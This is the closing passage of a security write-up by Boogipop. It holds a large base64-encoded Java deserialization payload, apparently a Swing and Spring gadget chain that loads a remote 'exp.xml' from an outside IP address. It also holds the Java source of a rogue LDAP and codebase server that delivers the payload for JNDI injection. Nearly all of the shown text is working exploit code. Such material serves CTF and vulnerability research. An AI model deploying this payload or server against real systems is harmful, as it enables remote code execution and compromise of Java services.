leHRGaWVsZNU5p/18PJiBAwAHSQALY29sdW1uV2lkdGhJAAdjb2x1bW5zSQATaG9yaXpvbnRhbEFsaWdubWVudEwABmFjdGlvbnQAFExqYXZheC9zd2luZy9BY3Rpb247TAAcYWN0aW9uUHJvcGVydHlDaGFuZ2VMaXN0ZW5lcnQAI0xqYXZhL2JlYW5zL1Byb3BlcnR5Q2hhbmdlTGlzdGVuZXI7TAAHY29tbWFuZHEAfgAfTAAKdmlzaWJpbGl0eXQAH0xqYXZheC9zd2luZy9Cb3VuZGVkUmFuZ2VNb2RlbDt4cgAfamF2YXguc3dpbmcudGV4dC5KVGV4dENvbXBvbmVudFg4kzYsDF77AgAUWgAUY2hlY2tlZElucHV0T3ZlcnJpZGVaAAtkcmFnRW5hYmxlZFoACGVkaXRhYmxlQwAQZm9jdXNBY2NlbGVyYXRvcloAF25lZWRUb1NlbmRLZXlUeXBlZEV2ZW50TAAKY2FyZXRDb2xvcnQAEExqYXZhL2F3dC9Db2xvcjtMABVjb21wb3NlZFRleHRBdHRyaWJ1dGV0ACVMamF2YXgvc3dpbmcvdGV4dC9TaW1wbGVBdHRyaWJ1dGVTZXQ7TAARY29tcG9zZWRUZXh0Q2FyZXR0ADNMamF2YXgvc3dpbmcvdGV4dC9KVGV4dENvbXBvbmVudCRDb21wb3NlZFRleHRDYXJldDtMABNjb21wb3NlZFRleHRDb250ZW50cQB+AB9MAA9jb21wb3NlZFRleHRFbmR0ABtMamF2YXgvc3dpbmcvdGV4dC9Qb3NpdGlvbjtMABFjb21wb3NlZFRleHRTdGFydHEAfgA3TAARZGlzYWJsZWRUZXh0Q29sb3JxAH4ANEwACGRyb3BNb2RldAAWTGphdmF4L3N3aW5nL0Ryb3BNb2RlO0wAFmxhdGVzdENvbW1pdHRlZFRleHRFbmRxAH4AN0wAGGxhdGVzdENvbW1pdHRlZFRleHRTdGFydHEAfgA3TAAGbWFyZ2ludAARTGphdmEvYXd0L0luc2V0cztMAAVtb2RlbHQAG0xqYXZheC9zd2luZy90ZXh0L0RvY3VtZW50O0wAEG5hdmlnYXRpb25GaWx0ZXJ0ACNMamF2YXgvc3dpbmcvdGV4dC9OYXZpZ2F0aW9uRmlsdGVyO0wAEXNlbGVjdGVkVGV4dENvbG9ycQB+ADRMAA5zZWxlY3Rpb25Db2xvcnEAfgA0eHIAFmphdmF4LnN3aW5nLkpDb21wb25lbnQ/rbvCEftqkwMAEEYACmFsaWdubWVudFhGAAphbGlnbm1lbnRZWgALYXV0b3Njcm9sbHNJAAVmbGFnc1oAD2lzQWxpZ25tZW50WFNldFoAD2lzQWxpZ25tZW50WVNldFoAGnZlcmlmeUlucHV0V2hlbkZvY3VzVGFyZ2V0TAAJYWN0aW9uTWFwcQB+AC5MABBhbmNlc3RvcklucHV0TWFwdAAWTGphdmF4L3N3aW5nL0lucHV0TWFwO0wABmJvcmRlcnQAG0xqYXZheC9zd2luZy9ib3JkZXIvQm9yZGVyO0wADWZvY3VzSW5wdXRNYXBxAH4APUwADWlucHV0VmVyaWZpZXJ0ABtMamF2YXgvc3dpbmcvSW5wdXRWZXJpZmllcjtMAAxsaXN0ZW5lckxpc3R0ACVMamF2YXgvc3dpbmcvZXZlbnQvRXZlbnRMaXN0ZW5lckxpc3Q7TAAJcG9wdXBNZW51dAAYTGphdmF4L3N3aW5nL0pQb3B1cE1lbnU7TAAVdmV0b2FibGVDaGFuZ2VTdXBwb3J0dAAiTGphdmEvYmVhbnMvVmV0b2FibGVDaGFuZ2VTdXBwb3J0O0wADndpbmRvd0lucHV0TWFwdAAfTGphdmF4L3N3aW5nL0NvbXBvbmVudElucHV0TWFwO3hyABJqYXZhLmF3dC5Db250YWluZXJAB4Bz/RQMJwMACEkAHmNvbnRhaW5lclNlcmlhbGl6ZWREYXRhVmVyc2lvbloADmZvY3VzQ3ljbGVSb290WgAcZm9jdXNUcmF2ZXJzYWxQb2xpY3lQcm92aWRlckkAC25jb21wb25lbnRzWwAJY29tcG9uZW50dAAVW0xqYXZhL2F3dC9Db21wb25lbnQ7TAAKZGlzcGF0Y2hlcnQAIExqYXZhL2F3dC9MaWdodHdlaWdodERpc3BhdGNoZXI7TAAJbGF5b3V0TWdydAAYTGphdmEvYXd0L0xheW91dE1hbmFnZXI7TAAHbWF4U2l6ZXQAFExqYXZhL2F3dC9EaW1lbnNpb247eHIAEmphdmEuYXd0LkNvbXBvbmVudJXqplnXPKSaAwAkWgAbYXV0b0ZvY3VzVHJhbnNmZXJPbkRpc3Bvc2FsSQAIYm91bmRzT3BJAB5jb21wb25lbnRTZXJpYWxpemVkRGF0YVZlcnNpb25aAAdlbmFibGVkSgAJZXZlbnRNYXNrWgAZZm9jdXNUcmF2ZXJzYWxLZXlzRW5hYmxlZFoACWZvY3VzYWJsZUkABmhlaWdodFoADWlnbm9yZVJlcGFpbnRJABxpc0ZvY3VzVHJhdmVyc2FibGVPdmVycmlkZGVuWgAIaXNQYWNrZWRaAAptYXhTaXplU2V0WgAKbWluU2l6ZVNldFoAEW5hbWVFeHBsaWNpdGx5U2V0WgANbmV3RXZlbnRzT25seVoAC3ByZWZTaXplU2V0WgAFdmFsaWRaAAd2aXNpYmxlSQAFd2lkdGhJAAF4SQABeUwAEWFjY2Vzc2libGVDb250ZXh0dAAnTGphdmF4L2FjY2Vzc2liaWxpdHkvQWNjZXNzaWJsZUNvbnRleHQ7TAAKYmFja2dyb3VuZHEAfgA0TAANY2hhbmdlU3VwcG9ydHQAIkxqYXZhL2JlYW5zL1Byb3BlcnR5Q2hhbmdlU3VwcG9ydDtMAAZjdXJzb3J0ABFMamF2YS9hd3QvQ3Vyc29yO0wACmRyb3BUYXJnZXR0ABlMamF2YS9hd3QvZG5kL0Ryb3BUYXJnZXQ7WwASZm9jdXNUcmF2ZXJzYWxLZXlzdAAQW0xqYXZhL3V0aWwvU2V0O0wABGZvbnR0AA9MamF2YS9hd3QvRm9udDtMAApmb3JlZ3JvdW5kcQB+ADRMAAZsb2NhbGV0ABJMamF2YS91dGlsL0xvY2FsZTtMAAdtYXhTaXplcQB+AEhMAAdtaW5TaXplcQB+AEhMAARuYW1lcQB+AB9MAAhwZWVyRm9udHEAfgBPTAAGcG9wdXBzdAASTGphdmEvdXRpbC9WZWN0b3I7TAAIcHJlZlNpemVxAH4ASHhwAQAAAAMAAAAEAQAAAAAAABg8AQEAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAHBzcgAgamF2YXguc3dpbmcucGxhZi5Db2xvclVJUmVzb3VyY2VrU/mf8urmkgIAAHhyAA5qYXZhLmF3dC5Db2xvcgGlF4MQjzN1AgAFRgAGZmFscGhhSQAFdmFsdWVMAAJjc3QAG0xqYXZhL2F3dC9jb2xvci9Db2xvclNwYWNlO1sACWZyZ2J2YWx1ZXQAAltGWwAGZnZhbHVlcQB+AFZ4cAAAAAD/////cHBwc3IAIGphdmEuYmVhbnMuUHJvcGVydHlDaGFuZ2VTdXBwb3J0WNXSZFdIYLsDAANJACpwcm9wZXJ0eUNoYW5nZVN1cHBvcnRTZXJpYWxpemVkRGF0YVZlcnNpb25MAAhjaGlsZHJlbnQAFUxqYXZhL3V0aWwvSGFzaHRhYmxlO0wABnNvdXJjZXEAfgAEeHAAAAACcHEAfgBScHhwcHBzcgAtY29tLmFwcGxlLmxhZi5BcXVhRm9udHMkRGVyaXZlZFVJUmVzb3VyY2VGb2507ovW3DiEFo0CAAB4cgAfamF2YXguc3dpbmcucGxhZi5Gb250VUlSZXNvdXJjZQFCxIfBIotHAgAAeHIADWphdmEuYXd0LkZvbnTFoTXmzN5WcwMABkkAGWZvbnRTZXJpYWxpemVkRGF0YVZlcnNpb25GAAlwb2ludFNpemVJAARzaXplSQAFc3R5bGVMABRmUmVxdWVzdGVkQXR0cmlidXRlc3EAfgBZTAAEbmFtZXEAfgAfeHAAAAABQVAAAAAAAA0AAAAAcHQADUx1Y2lkYSBHcmFuZGV4c3EAfgBTAAAAAP8AAABwcHBzcgAQamF2YS51dGlsLkxvY2FsZX74EWCcMPnsAwAGSQAIaGFzaGNvZGVMAAdjb3VudHJ5cQB+AB9MAApleHRlbnNpb25zcQB+AB9MAAhsYW5ndWFnZXEAfgAfTAAGc2NyaXB0cQB+AB9MAAd2YXJpYW50cQB+AB94cP////90AAJDTnQAAHQAAnpodAAESGFuc3EAfgBkeHBwcHBwcHQABmZvY3VzTHNyADFqYXZheC5zd2luZy50ZXh0LkpUZXh0Q29tcG9uZW50JE11dGFibGVDYXJldEV2ZW500R/T5kdZfP0CAANJAANkb3RaAApkcmFnQWN0aXZlSQAEbWFya3hyABxqYXZheC5zd2luZy5ldmVudC5DYXJldEV2ZW50yQnzW3JWr1ACAAB4cgAVamF2YS51dGlsLkV2ZW50T2JqZWN0TI0JThhtfagCAAB4cAAAAAAAAAAAAHQABm1vdXNlTHEAfgBrcHNyAB1qYXZhLmF3dC5Db21wb25lbnRPcmllbnRhdGlvbsbqp0WhnGPMAgABSQALb3JpZW50YXRpb254cAAAAAdwcHgAAAA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FX1NFTEVDVElPTnBwcHNyAB5qYXZheC5zd2luZy50ZXh0LlBsYWluRG9jdW1lbnRCCNfOucWF4AIAA0wABWFkZGVkcQB+AFFMAAtkZWZhdWx0Um9vdHQAM0xqYXZheC9zd2luZy90ZXh0L0Fic3RyYWN0RG9jdW1lbnQkQWJzdHJhY3RFbGVtZW50O0wAB3JlbW92ZWRxAH4AUXhyACFqYXZheC5zd2luZy50ZXh0LkFic3RyYWN0RG9jdW1lbnSxs0Ibkf3HGAIABUwAB2NvbnRleHR0ADRMamF2YXgvc3dpbmcvdGV4dC9BYnN0cmFjdERvY3VtZW50JEF0dHJpYnV0ZUNvbnRleHQ7TAAEZGF0YXQAK0xqYXZheC9zd2luZy90ZXh0L0Fic3RyYWN0RG9jdW1lbnQkQ29udGVudDtMAA5kb2N1bWVudEZpbHRlcnQAIUxqYXZheC9zd2luZy90ZXh0L0RvY3VtZW50RmlsdGVyO0wAEmRvY3VtZW50UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvRGljdGlvbmFyeTtMAAxsaXN0ZW5lckxpc3RxAH4AQHhwc3IAHWphdmF4LnN3aW5nLnRleHQuU3R5bGVDb250ZXh0b535fnu9ePEDAAJJAAp1bnVzZWRTZXRzTAAGc3R5bGVzdAAYTGphdmF4L3N3aW5nL3RleHQvU3R5bGU7eHAAAAAAc3IAKGphdmF4LnN3aW5nLnRleHQuU3R5bGVDb250ZXh0JE5hbWVkU3R5bGXnDE7G4IKspQMAAkwADGxpc3RlbmVyTGlzdHEAfgBATAAGdGhpcyQwdAAfTGphdmF4L3N3aW5nL3RleHQvU3R5bGVDb250ZXh0O3hwc3EAfgDqcHhxAH4A+ncEAAAAAXQAB2RlZmF1bHRzcQB+APtzcQB+AOpweHEAfgD6dwQAAAABdAAkamF2YXguc3dpbmcudGV4dC5TdHlsZUNvbnN0YW50cy5uYW1lcQB+AP94eHhzcgAeamF2YXguc3dpbmcudGV4dC5TdHJpbmdDb250ZW50QgCvvTb+BB0CAAJJAAVjb3VudFsABGRhdGF0AAJbQ3hwAAAAIXVyAAJbQ7AmZrDiXYSsAgAAeHAAAABAAGgAdAB0AHAAOgAvAC8AOAAuADEAMwAwAC4AMgA0AC4AMQA4ADgAOgA3ADcAOQAxAC8AZQB4AHAALgB4AG0AbAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwc3IAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAIdwgAAAALAAAABHQADmZpbHRlck5ld2xpbmVzc3IAEWphdmEubGFuZy5Cb29sZWFuzSBygNWc+u4CAAFaAAV2YWx1ZXhwAXNyABtqYXZhLmF3dC5mb250LlRleHRBdHRyaWJ1dGVreJ2MDegNRgIAAHhyAC9qYXZhLnRleHQuQXR0cmlidXRlZENoYXJhY3Rlckl0ZXJhdG9yJEF0dHJpYnV0ZYEedCbNRxdcAgABTAAEbmFtZXEAfgAfeHB0AA1ydW5fZGlyZWN0aW9uc3EAfgELAHQABGkxOG5xAH4BEXQAB3RhYlNpemVzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAACHhzcQB+AOp0ACJqYXZheC5zd2luZy5ldmVudC5Eb2N1bWVudExpc3RlbmVyc3IAL2phdmF4LnN3aW5nLkpGb3JtYXR0ZWRUZXh0RmllbGQkRG9jdW1lbnRIYW5kbGVyI3lKxkGKlgECAAFMAAZ0aGlzJDBxAH4AInhwcQB+AFJweHNyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKcHBwcHBwcHBwcHhzcgAvamF2YXguc3dpbmcudGV4dC5BYnN0cmFjdERvY3VtZW50JEJyYW5jaEVsZW1lbnQAUSlm9jzx8AIABEkACWxhc3RJbmRleEkACW5jaGlsZHJlblsACGNoaWxkcmVudAA0W0xqYXZheC9zd2luZy90ZXh0L0Fic3RyYWN0RG9jdW1lbnQkQWJzdHJhY3RFbGVtZW50O0wABnRoaXMkMHQAI0xqYXZheC9zd2luZy90ZXh0L0Fic3RyYWN0RG9jdW1lbnQ7eHIAMWphdmF4LnN3aW5nLnRleHQuQWJzdHJhY3REb2N1bWVudCRBYnN0cmFjdEVsZW1lbnTPsnjvvDfN2QMAAkwABnBhcmVudHQAGkxqYXZheC9zd2luZy90ZXh0L0VsZW1lbnQ7TAAGdGhpcyQwcQB+ASJ4cHBxAH4A93cEAAAAAHj/////AAAAAXVyADRbTGphdmF4LnN3aW5nLnRleHQuQWJzdHJhY3REb2N1bWVudCRBYnN0cmFjdEVsZW1lbnQ76hN0OXc60Z0CAAB4cAAAAAJzcgAtamF2YXguc3dpbmcudGV4dC5BYnN0cmFjdERvY3VtZW50JExlYWZFbGVtZW50avHT9IpjkckDAAFMAAZ0aGlzJDBxAH4BInhxAH4BI3EAfgElcQB+APd3BAAAAAB4cQB+APd3CAAAAAAAAAABeHBxAH4A93NxAH4BGwAAAAAAAAAAdXEAfgEeAAAACnBwcHBwcHBwcHB4cHBwAAAAAAAAAAAAAAAKcHBwc3IAJGphdmF4LnN3aW5nLkRlZmF1bHRCb3VuZGVkUmFuZ2VNb2RlbEJo7elGajz0AgAGSQAGZXh0ZW50WgALaXNBZGp1c3RpbmdJAANtYXhJAANtaW5JAAV2YWx1ZUwADGxpc3RlbmVyTGlzdHEAfgBAeHAAAAAAAAAAAGQAAAAAAAAAAHNxAH4A6nQAIGphdmF4LnN3aW5nLmV2ZW50LkNoYW5nZUxpc3RlbmVyc3IAJmphdmF4LnN3aW5nLkpUZXh0RmllbGQkU2Nyb2xsUmVwYWludGVyXFnaAlsy6XICAAFMAAZ0aGlzJDB0ABhMamF2YXgvc3dpbmcvSlRleHRGaWVsZDt4cHEAfgBScHh4AAAAAAAAAXEAfgEacHEAfgAoc3IAIWphdmF4LnN3aW5nLnRleHQuRGVmYXVsdEZvcm1hdHRlcm/GpIfshP8BAgAGWgANYWxsb3dzSW52YWxpZFoADGNvbW1pdE9uRWRpdFoADW92ZXJ3cml0ZU1vZGVMAA5kb2N1bWVudEZpbHRlcnEAfgD1TAAQbmF2aWdhdGlvbkZpbHRlcnEAfgA7TAAKdmFsdWVDbGFzc3EAfgATeHIAMWphdmF4LnN3aW5nLkpGb3JtYXR0ZWRUZXh0RmllbGQkQWJzdHJhY3RGb3JtYXR0ZXJIb2KeGrCXPgIAAUwAA2Z0ZnEAfgAieHBwAQABcHB2cgBCb3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuQ2xhc3NQYXRoWG1sQXBwbGljYXRpb25Db250ZXh0AAAAAAAAAAAAAAB4cHBwcHhxAH4ABXNxAH4AAnEAfgARcQB+AChxAH4BOHg="));
//            } catch (ParseException e1) {
//                e1.printStackTrace();
//            }
            /** Payload2 end **/

            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

    }

    public static void main(String[] args) throws Exception {

//        System.out.println("HttpServerAddress: "+args[0]);
//        System.out.println("HttpServerPort: "+args[1]);
//        System.out.println("LDAPServerPort: "+args[2]);
        String http_server_ip = "127.0.0.1";
        int ldap_port = 8089;
        int http_server_port = 8001;

        CodebaseServer.lanuchCodebaseURLServer(http_server_ip, http_server_port);
        lanuchLDAPServer(ldap_port, http_server_ip, http_server_port);
    }
}

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#WriteUp